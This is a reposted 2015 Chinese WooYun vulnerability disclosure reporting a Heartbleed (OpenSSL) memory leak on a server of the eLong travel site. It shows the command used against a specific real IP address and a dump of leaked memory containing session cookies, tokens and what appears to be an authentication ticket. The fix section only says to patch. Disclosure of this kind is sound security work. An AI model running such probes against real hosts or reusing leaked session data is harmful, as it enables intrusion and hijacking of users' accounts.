记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

艺龙旅行网某服务器存在心脏滴血漏洞

2015-02-27 00:20

艺龙无线

m.elong.com1.jpg



code 区域
python openssl.py 211.151.235.154:443

漏洞证明:

code 区域
#.......ing: gzip, deflate, sdch..Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4..Cookie: NSC_uftu.zjmpoh.dpn_443=ffffffffaf1d0d5245525d5f4f58455e445a4a42378b; TLTSID=D5E6C636430DB5F92F8B2FBE86A342BF; TLTCNT=CAE-MHTML5-40000000000000004; TLTHID=A915CC7F4E1FF79C82DB2698961EF359..... ....).z`U......?+..........t..;k...G2.Eo.n.....H....w..?a.....Z.2FBE86A342BF; TLTHID=5A7AA47A41096AEA9D7B19A0E3C955A0; TLTCNT=CAE-MHTML5-40000000000000004.....Q....Y..1..\"...`..............*@7.h.....l.V.._b1.7.$..<.%V......^AABAAAAAQAAAAlFTE9ORy5DT00AAAAJeWFsaS56aGFvAAAAAgAAAAIAAAAJRUxPTkcuQ09NAAAABmtyYnRndAAAAAlFTE9ORy5DT00AEgAAACDA07sena3jxQbDvxNBigjyBOjFNjkMNzhLz5UVTC3RTVSzoCpUs6AqVLQsylS08aoAAMEAAAAAAAAAAAAAAAABVGGCAVAwggFMoAMCAQWhCxsJRUxPTkcuQ09Noh4wHKADAgECoRUwExsGa3JidGd0GwlFTE9ORy5DT02jggEWMIIBEqADAgESoQMCAQGiggEEBIIBAEvhSBOzmQlDBGy6KtYRcNl%2BBTj0ImYcbXPmh9coKWHLRCfUwiMw2Tohb3x6SRH0P5G7prmtcSoTfco78Xtq6oNQgoddu7NbL%2B9oaG7sm5UFOhIENbSKbBC6x1g%2BGPwmsRAXJgOFKPN3SP5RlST02W8Ss2wpJ8buid1M0GQbr5DBxv%2BOz0wpOb5kPRh0VGaVw3HsL7IW3y%2BLydY95jIKkDCFZWrKLeCfPFuhMRPEWJ2484g%2FSSF9bSBo34S58FaMmTi6Z86Bo0SSkUf2XpbqCWPiP2SNzPzOMlQ5pWEzcZp7iKsUQMNQnRpIH4GAK3BN29uqyBtkaQWlfKwFWh1Lo7AAAAAA; TLTCNT=CAE-MHTML5-40000000000000012; H5SessionId=0f34f48c-6ad1-49b7-82e8-30107abbdbb6; Hm_lvt_68f93b8ecf70d9e560663ca99359d762=1421057912,1421057942,1421057957,1421058729; Hm_lpvt_68f93b8ecf70d9e560663ca99359d762=1421058729; SessionToken=ac978ece-8577-4971-bfcb-8f6a26db4f15622; Hm_lvt_05cce32de5e4df0ddcbabc963c03e3a5=1421058736; Hm_lpvt_05cce32de5e4df0ddcbabc963c03e3a5=1421058740; TLTHID=4D192D054908380B4081CDB1F2C19661....n..34.j.`{J.!...K....................b.....3.wL!.T...$.5P..............i...........................................................................................

修复方案:

补丁


知识来源: www.wooyun.org/bugs/wooyun-2015-091542

阅读:127518 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“艺龙旅行网某服务器存在心脏滴血漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云